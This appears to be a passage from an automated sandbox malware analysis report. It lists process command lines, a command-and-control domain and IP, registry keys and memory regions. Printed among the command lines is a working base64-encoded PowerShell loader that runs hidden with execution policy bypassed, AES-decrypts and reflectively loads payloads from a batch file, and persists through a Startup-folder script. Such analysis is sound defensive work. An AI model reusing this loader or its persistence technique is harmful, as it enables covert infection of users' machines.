aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 36 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
idonetire.duckdns.org
|
|
||
|
http://.)
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.microg
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
idonetire.duckdns.org
|
37.120.208.37
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
37.120.208.37
|
idonetire.duckdns.org
|
Romania
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JSVSVI
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JSVSVI
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JSVSVI
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JSVSVI
|
UID
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
C028000
|
unclassified section
|
page readonly
|
|
|
|
ADA8000
|
unclassified section
|
page readonly
|
|
|
|
A8F8000
|
unclassified section
|
page readonly
|
|
|
|
2DDE000
|
heap
|
page read and write
|
|
|
|
77A8000
|
heap
|
page read and write
|
|
|
|
6DBC000
|
heap
|
page read and write
|
|
|
|
8710000
|
heap
|
page read and write
|
|
|
|
8418000
|
unclassified section
|
page readonly
|
|
|
|
72B0000
|
heap
|
page read and write
|
|
|
|
8DA0000
|
direct allocation
|
page read and write
|
|
|
|
7DA0000
|
heap
|
page read and write
|
|
|
|
8E79000
|
unclassified section
|
page readonly
|
|
|
|
ADE8000
|
unclassified section
|
page readonly
|
|
|
|
6AE000
|
heap
|
page read and write
|
|
|
|
7CFB000
|
heap
|
page read and write
|
|
|
|
2DF6000
|
heap
|
page read and write
|
|
|
|
723A000
|
heap
|
page read and write
|
|
|
|
8DE0000
|
trusted library allocation
|
page read and write
|
||
|
3341000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AF6000
|
trusted library allocation
|
page read and write
|
||
|
6BF1000
|
heap
|
page read and write
|
||
|
7FF0000
|
trusted library allocation
|
page read and write
|
||
|
8FA4000
|
trusted library allocation
|
page read and write
|
||
|
951000
|
heap
|
page read and write
|
||
|
9C8D000
|
trusted library allocation
|
page read and write
|
||
|
61C000
|
heap
|
page read and write
|
||
|
A8B4000
|
unclassified section
|
page execute read
|
||
|
69ED000
|
stack
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
7C0D000
|
stack
|
page read and write
|
||
|
6F7A000
|
stack
|
page read and write
|
||
|
90A0000
|
trusted library allocation
|
page read and write
|
||
|
2B95000
|
trusted library allocation
|
page execute and read and write
|
||
|
8F66000
|
trusted library allocation
|
page read and write
|
||
|
BFC0000
|
unclassified section
|
page readonly
|
||
|
478000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
21B57F46000
|
heap
|
page read and write
|
||
|
8E90000
|
trusted library allocation
|
page read and write
|
||
|
4784000
|
trusted library allocation
|
page read and write
|
||
|
6B0E000
|
stack
|
page read and write
|
||
|
901C000
|
trusted library allocation
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
5B55000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
heap
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
8080000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B9E000
|
stack
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
472E000
|
stack
|
page read and write
|
||
|
74EE000
|
heap
|
page read and write
|
||
|
8020000
|
trusted library allocation
|
page read and write
|
||
|
721F000
|
stack
|
page read and write
|
||
|
9034000
|
trusted library allocation
|
page read and write
|
||
|
66A0000
|
heap
|
page execute and read and write
|
||
|
8010000
|
trusted library allocation
|
page read and write
|
||
|
8DCE000
|
trusted library allocation
|
page read and write
|
||
|
8F90000
|
trusted library allocation
|
page read and write
|
||
|
5C28000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
8029000
|
trusted library allocation
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
ABD000
|
stack
|
page read and write
|
||
|
8ACD000
|
stack
|
page read and write
|
||
|
8090000
|
heap
|
page read and write
|
||
|
4DCC000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
8F32000
|
trusted library allocation
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A0BB000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
8B6000
|
heap
|
page read and write
|
||
|
328A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8FAA000
|
trusted library allocation
|
page read and write
|
||
|
8D44000
|
trusted library allocation
|
page read and write
|
||
|
2D88000
|
heap
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
9681000
|
trusted library allocation
|
page read and write
|
||
|
6F1000
|
heap
|
page read and write
|
||
|
5864000
|
trusted library allocation
|
page read and write
|
||
|
21B585F3000
|
heap
|
page read and write
|
||
|
66ED000
|
stack
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
8D52000
|
trusted library allocation
|
page read and write
|
||
|
8F92000
|
trusted library allocation
|
page read and write
|
||
|
8FF6000
|
trusted library allocation
|
page read and write
|
||
|
5531000
|
trusted library allocation
|
page read and write
|
||
|
2C43000
|
heap
|
page read and write
|
||
|
6FAE000
|
trusted library allocation
|
page read and write
|
||
|
BFE4000
|
unclassified section
|
page execute read
|
||
|
9028000
|
trusted library allocation
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
8D68000
|
trusted library allocation
|
page read and write
|
||
|
909E000
|
trusted library allocation
|
page read and write
|
||
|
3F89000
|
trusted library allocation
|
page read and write
|
||
|
7BC9000
|
trusted library allocation
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
21B56200000
|
heap
|
page read and write
|
||
|
405E000
|
stack
|
page read and write
|
||
|
6DF0000
|
heap
|
page execute and read and write
|
||
|
8D50000
|
trusted library allocation
|
page read and write
|
||
|
A902000
|
unclassified section
|
page read and write
|
||
|
8E46000
|
trusted library allocation
|
page read and write
|
||
|
2DC2000
|
heap
|
page read and write
|
||
|
7311000
|
heap
|
page read and write
|
||
|
86E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E70000
|
trusted library allocation
|
page read and write
|
||
|
8FCC000
|
trusted library allocation
|
page read and write
|
||
|
63ED000
|
trusted library allocation
|
page read and write
|
||
|
4643000
|
trusted library allocation
|
page execute and read and write
|
||
|
8DE8000
|
trusted library allocation
|
page read and write
|
||
|
B4FD000
|
trusted library allocation
|
page read and write
|
||
|
9044000
|
trusted library allocation
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
8E12000
|
trusted library allocation
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
21B5804B000
|
heap
|
page read and write
|
||
|
72EB000
|
stack
|
page read and write
|
||
|
49D000
|
heap
|
page read and write
|
||
|
7CB9000
|
heap
|
page read and write
|
||
|
AD6F000
|
unclassified section
|
page execute read
|
||
|
8700000
|
heap
|
page read and write
|
||
|
90DA000
|
trusted library allocation
|
page read and write
|
||
|
4779000
|
heap
|
page read and write
|
||
|
21B583F1000
|
heap
|
page read and write
|
||
|
671F000
|
trusted library allocation
|
page read and write
|
||
|
BFEF000
|
unclassified section
|
page execute read
|
||
|
72C7000
|
trusted library allocation
|
page read and write
|
||
|
AF43000
|
trusted library allocation
|
page read and write
|
||
|
8D20000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
94A000
|
heap
|
page read and write
|
||
|
7470000
|
heap
|
page read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
80C7000
|
trusted library allocation
|
page read and write
|
||
|
A8C1000
|
unclassified section
|
page execute read
|
||
|
7996000
|
trusted library allocation
|
page read and write
|
||
|
905C000
|
trusted library allocation
|
page read and write
|
||
|
2DE9000
|
heap
|
page read and write
|
||
|
9016000
|
trusted library allocation
|
page read and write
|
||
|
6DDD1FD000
|
stack
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
6E50000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
heap
|
page execute and read and write
|
||
|
AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FA0000
|
heap
|
page read and write
|
||
|
3F94000
|
trusted library allocation
|
page read and write
|
||
|
7F92000
|
heap
|
page read and write
|
||
|
21B583F0000
|
heap
|
page read and write
|
||
|
8F2C000
|
trusted library allocation
|
page read and write
|
||
|
A129000
|
trusted library allocation
|
page read and write
|
||
|
4670000
|
trusted library allocation
|
page read and write
|
||
|
8F9C000
|
trusted library allocation
|
page read and write
|
||
|
6121000
|
trusted library allocation
|
page read and write
|
||
|
2D97000
|
heap
|
page read and write
|
||
|
8F74000
|
trusted library allocation
|
page read and write
|
||
|
6D95000
|
heap
|
page read and write
|
||
|
8E96000
|
trusted library allocation
|
page read and write
|
||
|
9DFA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7487000
|
trusted library allocation
|
page read and write
|
||
|
2D13000
|
heap
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
696000
|
heap
|
page read and write
|
||
|
6E25000
|
trusted library allocation
|
page read and write
|
||
|
8E6A000
|
trusted library allocation
|
page read and write
|
||
|
619C000
|
trusted library allocation
|
page read and write
|
||
|
9070000
|
trusted library allocation
|
page read and write
|
||
|
6D20000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
6DDD2FE000
|
stack
|
page read and write
|
||
|
741D000
|
stack
|
page read and write
|
||
|
62F6000
|
trusted library allocation
|
page read and write
|
||
|
8F62000
|
trusted library allocation
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
8E9C000
|
trusted library allocation
|
page read and write
|
||
|
7780000
|
heap
|
page read and write
|
||
|
6BC1000
|
heap
|
page read and write
|
||
|
8B8000
|
heap
|
page read and write
|
||
|
95A1000
|
trusted library allocation
|
page read and write
|
||
|
AFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
AD99000
|
unclassified section
|
page readonly
|
||
|
9098000
|
trusted library allocation
|
page read and write
|
||
|
7DB0000
|
heap
|
page read and write
|
||
|
9E3F000
|
trusted library allocation
|
page read and write
|
||
|
6A6E000
|
stack
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
759B000
|
trusted library allocation
|
page read and write
|
||
|
7214000
|
heap
|
page read and write
|
||
|
21B55F80000
|
heap
|
page read and write
|
||
|
459E000
|
stack
|
page read and write
|
||
|
412E000
|
stack
|
page read and write
|
||
|
7867000
|
trusted library allocation
|
page read and write
|
||
|
8F56000
|
trusted library allocation
|
page read and write
|
||
|
464D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
21B57F45000
|
heap
|
page read and write
|
||
|
9032000
|
trusted library allocation
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
8D40000
|
trusted library allocation
|
page read and write
|
||
|
B043000
|
trusted library allocation
|
page read and write
|
||
|
6DDCBFE000
|
stack
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
68B000
|
heap
|
page read and write
|
||
|
4F90000
|
heap
|
page read and write
|
||
|
6DE7000
|
trusted library allocation
|
page read and write
|
||
|
3026000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
21B585FA000
|
heap
|
page read and write
|
||
|
8668000
|
heap
|
page read and write
|
||
|
6DEA000
|
stack
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
7427000
|
trusted library allocation
|
page read and write
|
||
|
70CB000
|
stack
|
page read and write
|
||
|
8DA0000
|
trusted library allocation
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
8660000
|
heap
|
page read and write
|
||
|
5C56000
|
trusted library allocation
|
page read and write
|
||
|
6D4F000
|
heap
|
page read and write
|
||
|
80A6000
|
trusted library allocation
|
page read and write
|
||
|
8DE2000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
8F68000
|
trusted library allocation
|
page read and write
|
||
|
6D22000
|
heap
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page read and write
|
||
|
4C01000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
C019000
|
unclassified section
|
page readonly
|
||
|
7A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
90AA000
|
trusted library allocation
|
page read and write
|
||
|
906A000
|
trusted library allocation
|
page read and write
|
||
|
8299000
|
trusted library allocation
|
page read and write
|
||
|
ADA1000
|
unclassified section
|
page execute read
|
||
|
2C59000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3264000
|
trusted library allocation
|
page read and write
|
||
|
8F78000
|
trusted library allocation
|
page read and write
|
||
|
6A0A000
|
stack
|
page read and write
|
||
|
4851000
|
trusted library allocation
|
page read and write
|
||
|
77B9000
|
heap
|
page read and write
|
||
|
2D1A000
|
heap
|
page read and write
|
||
|
8187000
|
stack
|
page read and write
|
||
|
9058000
|
trusted library allocation
|
page read and write
|
||
|
8906000
|
trusted library allocation
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
901A000
|
trusted library allocation
|
page read and write
|
||
|
7BB5000
|
trusted library allocation
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
902C000
|
trusted library allocation
|
page read and write
|
||
|
B0B1000
|
trusted library allocation
|
page read and write
|
||
|
6736000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
4090000
|
heap
|
page read and write
|
||
|
65BE000
|
stack
|
page read and write
|
||
|
8E24000
|
trusted library allocation
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
8E4E000
|
trusted library allocation
|
page read and write
|
||
|
8F0E000
|
trusted library allocation
|
page read and write
|
||
|
8D6A000
|
trusted library allocation
|
page read and write
|
||
|
8EA6000
|
trusted library allocation
|
page read and write
|
||
|
740F000
|
stack
|
page read and write
|
||
|
891E000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
8DB2000
|
trusted library allocation
|
page read and write
|
||
|
81FF000
|
heap
|
page read and write
|
||
|
913000
|
heap
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
9086000
|
trusted library allocation
|
page read and write
|
||
|
7E0E000
|
heap
|
page read and write
|
||
|
A8D000
|
stack
|
page read and write
|
||
|
B501000
|
trusted library allocation
|
page read and write
|
||
|
70E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
90C2000
|
